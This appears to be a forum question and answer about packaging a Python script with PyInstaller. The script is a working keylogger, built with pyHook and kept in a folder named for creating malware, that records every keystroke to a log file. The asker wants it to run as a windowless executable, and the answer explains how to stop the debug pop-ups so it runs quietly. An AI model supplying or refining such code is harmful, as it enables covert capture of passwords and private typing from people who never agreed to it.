# Using Pyinstaller with -noconsole gives Pop-ups instead

Tags: python, console, popup, exe, pyinstaller

I have python file, saved with .pyw to suppress console

```
import pyHook, pythoncom, sys, logging

file_log = 'C:\\Lets_Create_Malware\\log.txt'

def OnKeyboardEvent (event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Then I convert to .exe with pyinstaller,

```
c:\Python27\Malware>pyinstaller --debug --onefile --noupx keylogger.pyw
```

but when I double-click the .exe, I get console

[image]

I tried --noconsole option, i.e.

```
c:\Python27\Malware>pyinstaller --debug --onefile --noupx --noconsole keylogger.pyw
```

But when I double-click the .exe, I get series of annoying pop-ups that I must terminate with Task Manager.

How to fix?

[image]

Answer (score 3):

Please create a .spec file and then add in the EXE section just

> debug=False

The PyInstaller manual explains spec files [here](https://pythonhosted.org/PyInstaller/spec-files.html). Then call the pyinstaller with the spec file instead of the script file.